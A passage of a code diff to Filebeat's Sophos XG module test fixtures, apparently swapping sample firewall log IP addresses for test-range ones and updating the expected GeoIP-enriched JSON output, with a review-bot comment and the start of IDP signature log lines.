log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" 
date=2018-05-30 time=15:09:51 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011702605051 log_type="Firewall" log_component="MAC Filter" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.531" out_interface="" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol="UDP" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-06-01 time=10:57:55 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600006 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" 
user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0
diff --git a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json
index d441f78dbfd9..deb91f6a5a39 100644
--- a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json
@@ -2,22 +2,12 @@
 {
 "@timestamp": "2020-05-18T14:38:37.000-02:00",
 "client.bytes": 459,
- "client.ip": "172.17.34.15",
+ "client.ip": "1.128.3.4",
 "client.mac": "00:00:00:00:00:00",
 "client.nat.port": 0,
 "client.packets": 6,
 "client.port": 62841,
- "destination.as.number": 50881,
- "destination.as.organization.name": "ESET, spol. s r.o.",
 "destination.bytes": 606,
- "destination.geo.city_name": "Bratislava",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "SK",
- "destination.geo.country_name": "Slovakia",
- "destination.geo.location.lat": 48.15,
- "destination.geo.location.lon": 17.1078,
- "destination.geo.region_iso_code": "SK-BL",
- "destination.geo.region_name": "Bratislava",
 "destination.ip": "91.228.167.86",
 "destination.nat.port": 0,
 "destination.packets": 5,
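Review bot: The hunk replaces only the source addresses that were being geo-enriched (`src_ip=1.128.3.4`, `src_ip=67.43.156.12`, `dst_ip=175.16.199.1`) while its context lines keep other public addresses unchanged (`dst_ip=91.228.167.86`, `dst_ip=185.7.209.207`, `tran_src_ip=213.167.51.66`), so the expected output presumably now depends on those addresses being absent from the GeoIP test database rather than on them being non-routable. Switching the addresses that are not meant to be enriched to RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) would make that intent explicit and stop the fixture from naming real third-party hosts. Reusing `67.43.156.12` as the source of both the Port3.400 DNS event and the Port2 "Appliance Access" denial also makes those two events indistinguishable by address in `related.ip` checks; a second test-range address would keep them distinct.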
@@ -32,7 +22,7 @@
 "event.end": "2020-05-18T14:38:48.000-02:00",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=1.128.3.4 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 
srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
 "event.outcome": "success",
 "event.severity": "6",
 "event.start": "2020-05-18T14:38:37.000-02:00",
@@ -64,7 +54,7 @@
 "my_fancy_host"
 ],
 "related.ip": [
- "172.17.34.15",
+ "1.128.3.4",
 "213.167.51.66",
 "91.228.167.86"
 ],
@@ -97,15 +87,10 @@
 "sophos.xg.priority": "Information",
 "sophos.xg.src_country_code": "R1",
 "sophos.xg.status": "Allow",
- "source.as.number": 8905,
- "source.as.organization.name": "Digit One LLC",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
 "source.bytes": 459,
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7386,
- "source.geo.location.lon": 37.6068,
- "source.ip": "172.17.34.15",
+ "source.ip": "1.128.3.4",
 "source.mac": "00:00:00:00:00:00",
 "source.nat.ip": "213.167.51.66",
 "source.nat.port": 0,
@@ -119,22 +104,12 @@
 {
 "@timestamp": "2020-05-18T14:38:38.000-02:00",
 "client.bytes": 0,
- "client.ip": "172.16.66.155",
+ "client.ip": "67.43.156.12",
 "client.mac": "00:00:00:00:00:00",
 "client.nat.port": 0,
 "client.packets": 0,
 "client.port": 49144,
- "destination.as.number": 50881,
- "destination.as.organization.name": "ESET, spol. s r.o.",
 "destination.bytes": 0,
- "destination.geo.city_name": "Bratislava",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "SK",
- "destination.geo.country_name": "Slovakia",
- "destination.geo.location.lat": 48.15,
- "destination.geo.location.lon": 17.1078,
- "destination.geo.region_iso_code": "SK-BL",
- "destination.geo.region_name": "Bratislava",
 "destination.ip": "91.228.165.117",
 "destination.nat.port": 0,
 "destination.packets": 0,
@@ -149,7 +124,7 @@
 "event.end": "2020-05-18T14:38:38.000-02:00",
 "event.kind": "event",
 "event.module": "sophos",
- "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
+ "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=67.43.156.12 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip=\"\" 
tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
 "event.outcome": "success",
 "event.severity": "6",
 "event.start": "2020-05-18T14:38:38.000-02:00",
@@ -163,7 +138,7 @@
 "host.name": "some_other_host.local",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 986,
+ "log.offset": 983,
 "network.bytes": 0,
 "network.direction": "outbound",
 "network.packets": 0,
@@ -181,8 +156,8 @@
 "some_other_host.local"
 ],
 "related.ip": [
- "172.16.66.155",
 "185.8.209.194",
+ "67.43.156.12",
 "91.228.165.117"
 ],
 "rule.id": "67",
@@ -214,18 +189,14 @@
 "sophos.xg.priority": "Information",
 "sophos.xg.src_country_code": "R1",
 "sophos.xg.status": "Allow",
- "source.as.number": 199567,
- "source.as.organization.name": "Fr. Sauter AG",
+ "source.as.number": 35908,
 "source.bytes": 0,
- "source.geo.city_name": "Saint-Prex",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "CH",
- "source.geo.country_name": "Switzerland",
- "source.geo.location.lat": 46.4796,
- "source.geo.location.lon": 6.4599,
- "source.geo.region_iso_code": "CH-VD",
- "source.geo.region_name": "Vaud",
- "source.ip": "172.16.66.155",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.mac": "00:00:00:00:00:00",
 "source.nat.ip": "185.8.209.194",
 "source.nat.port": 0,
@@ -272,7 +243,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 1975,
+ "log.offset": 1971,
 "network.bytes": 0,
 "network.packets": 0,
 "network.transport": "tcp",
@@ -358,7 +329,7 @@
 "host.name": "my_fancy_host",
 "input.type": "log",
 "log.level": "informational",
- "log.offset": 2871,
+ "log.offset": 2867,
 "network.bytes": 0,
 "network.packets": 0,
 "network.transport": "tcp",
@@ -416,19 +387,12 @@
 {
 "@timestamp": "2020-05-18T14:38:41.000-02:00",
 "client.bytes": 0,
- "client.ip": "51.77.56.9",
+ "client.ip": "67.43.156.12",
 "client.mac": "c4:f7:d5:b5:47:f4",
 "client.nat.port": 0,
 "client.packets": 0,
 "client.port": 55039,
- "destination.as.number": 42652,
- "destination.as.organization.name": "inexio Informationstechnologie und Telekommunikation Gmbh",
 "destination.bytes": 0,
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.ip": "185.7.209.207",
 "destination.nat.port": 0,
 "destination.packets": 0,
@@ -443,7 +407,7 @@ "event.end": "2020-05-18T14:38:41.000-02:00", "event.kind": "event", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code=\"\" dst_ip=185.7.209.207 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=67.43.156.12 src_country_code=\"\" dst_ip=185.7.209.207 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" 
message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "event.outcome": "success", "event.severity": "6", "event.start": "2020-05-18T14:38:41.000-02:00", @@ -456,7 +420,7 @@ "host.name": "some_other_host.local", "input.type": "log", "log.level": "informational", - "log.offset": 3784, + "log.offset": 3780, "network.bytes": 0, "network.packets": 0, "network.transport": "tcp", @@ -470,7 +434,7 @@ ], "related.ip": [ "185.7.209.207", - "51.77.56.9" + "67.43.156.12" ], "rule.id": "0", "rule.ruleset": "0", @@ -495,18 +459,14 @@ "sophos.xg.message_id": "02002", "sophos.xg.priority": "Information", "sophos.xg.status": "Deny", - "source.as.number": 16276, - "source.as.organization.name": "OVH SAS", + "source.as.number": 35908, "source.bytes": 0, - "source.geo.city_name": "Warsaw", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "PL", - "source.geo.country_name": "Poland", - "source.geo.location.lat": 52.25, - "source.geo.location.lon": 21.0, - "source.geo.region_iso_code": "PL-14", - "source.geo.region_name": "Mazovia", - "source.ip": "51.77.56.9", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.mac": "c4:f7:d5:b5:47:f4", "source.nat.port": 0, "source.packets": 0, @@ -552,7 +512,7 @@ "host.name": "my_fancy_host", "input.type": "log", "log.level": "informational", - "log.offset": 4674, + "log.offset": 4672, "network.bytes": 0, "network.packets": 0, "network.transport": "tcp", @@ -645,7 +605,7 @@ "host.name": "some_other_host.local", "input.type": "log", "log.level": "warning", - "log.offset": 5608, + "log.offset": 5606, "network.bytes": 0, "network.packets": 0, "network.transport": "udp", 
@@ -730,7 +690,7 @@ "host.name": "my_fancy_host", "input.type": "log", "log.level": "informational", - "log.offset": 6492, + "log.offset": 6490, "network.bytes": 0, "network.packets": 0, "network.transport": "tcp", @@ -816,7 +776,7 @@ "host.name": "my_fancy_host", "input.type": "log", "log.level": "informational", - "log.offset": 7360, + "log.offset": 7358, "network.bytes": 0, "network.direction": "internal", "network.packets": 0, @@ -914,7 +874,7 @@ "host.name": "some_other_host.local", "input.type": "log", "log.level": "notification", - "log.offset": 8335, + "log.offset": 8333, "network.bytes": 0, "network.packets": 0, "network.transport": "icmp", @@ -1002,7 +962,7 @@ "host.name": "some_other_host.local", "input.type": "log", "log.level": "informational", - "log.offset": 9256, + "log.offset": 9254, "network.bytes": 3534, "network.packets": 12, "network.transport": "tcp", @@ -1064,15 +1024,16 @@ "client.nat.port": 0, "client.packets": 0, "client.port": 1353, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 0, "destination.port": 0, 
@@ -1086,7 +1047,7 @@ "event.end": "2018-05-30T13:26:37.000-02:00", "event.kind": "event", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", + "event.original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", "event.outcome": 
"success", "event.severity": "6", "event.start": "2018-05-30T13:26:37.000-02:00", @@ -1099,7 +1060,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 10196, + "log.offset": 10194, "network.bytes": 0, "network.packets": 0, "network.transport": "udp", @@ -1112,12 +1073,12 @@ ], "related.ip": [ "10.198.32.19", - "8.8.8.8" + "175.16.199.1" ], "rule.id": "0", "rule.ruleset": "0", "server.bytes": 0, - "server.ip": "8.8.8.8", + "server.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 0, "server.port": 0, @@ -1182,7 +1143,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 11056, + "log.offset": 11059, "network.bytes": 0, "network.packets": 0, "network.transport": "0", @@ -1264,7 +1225,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 11884, + "log.offset": 11887, "network.bytes": 0, "network.packets": 0, "network.transport": "udp", @@ -1350,7 +1311,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 12754, + "log.offset": 12757, "network.bytes": 0, "network.packets": 0, "network.transport": "tcp", @@ -1432,7 +1393,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 13610, + "log.offset": 13613, "network.bytes": 0, "network.packets": 0, "network.transport": "icmp", 
@@ -1486,15 +1447,16 @@ "client.nat.port": 0, "client.packets": 0, "client.port": 1571, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 0, "destination.port": 80, 
@@ -1509,7 +1471,7 @@ "event.end": "2018-05-31T17:05:14.000-02:00", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", + "event.original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "event.outcome": "success", "event.severity": "6", "event.start": 
"2018-05-31T17:05:14.000-02:00", @@ -1522,7 +1484,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 14452, + "log.offset": 14455, "network.bytes": 0, "network.packets": 0, "network.transport": "tcp", @@ -1535,12 +1497,12 @@ ], "related.ip": [ "10.198.12.19", - "8.8.8.8" + "175.16.199.1" ], "rule.id": "1", "rule.ruleset": "1", "server.bytes": 0, - "server.ip": "8.8.8.8", + "server.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 0, "server.port": 80, @@ -1605,7 +1567,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 15286, + "log.offset": 15294, "network.bytes": 0, "network.packets": 0, "network.transport": "udp", @@ -1688,7 +1650,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 16158, + "log.offset": 16166, "network.bytes": 0, "network.packets": 0, "network.transport": "icmp", @@ -1745,17 +1707,7 @@ "client.mac": "08:00:27:4c:49:e3", "client.nat.port": 0, "client.packets": 0, - "destination.as.number": 109, - "destination.as.organization.name": "Cisco Systems, Inc.", "destination.bytes": 0, - "destination.geo.city_name": "Richardson", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 32.9473, - "destination.geo.location.lon": -96.7028, - "destination.geo.region_iso_code": "US-TX", - "destination.geo.region_name": "Texas", "destination.ip": "72.163.4.185", "destination.nat.port": 0, "destination.packets": 0, @@ -1783,7 +1735,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 17024, + "log.offset": 17032, "network.bytes": 0, "network.packets": 0, "network.transport": "icmp", 
diff --git a/x-pack/filebeat/module/sophos/xg/test/idp.log b/x-pack/filebeat/module/sophos/xg/test/idp.log
index dd9e406f0774..818b057ba8fb 100644
--- a/x-pack/filebeat/module/sophos/xg/test/idp.log
+++ b/x-pack/filebeat/module/sophos/xg/test/idp.log
@@ -1,6 +1,6 @@ -<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application 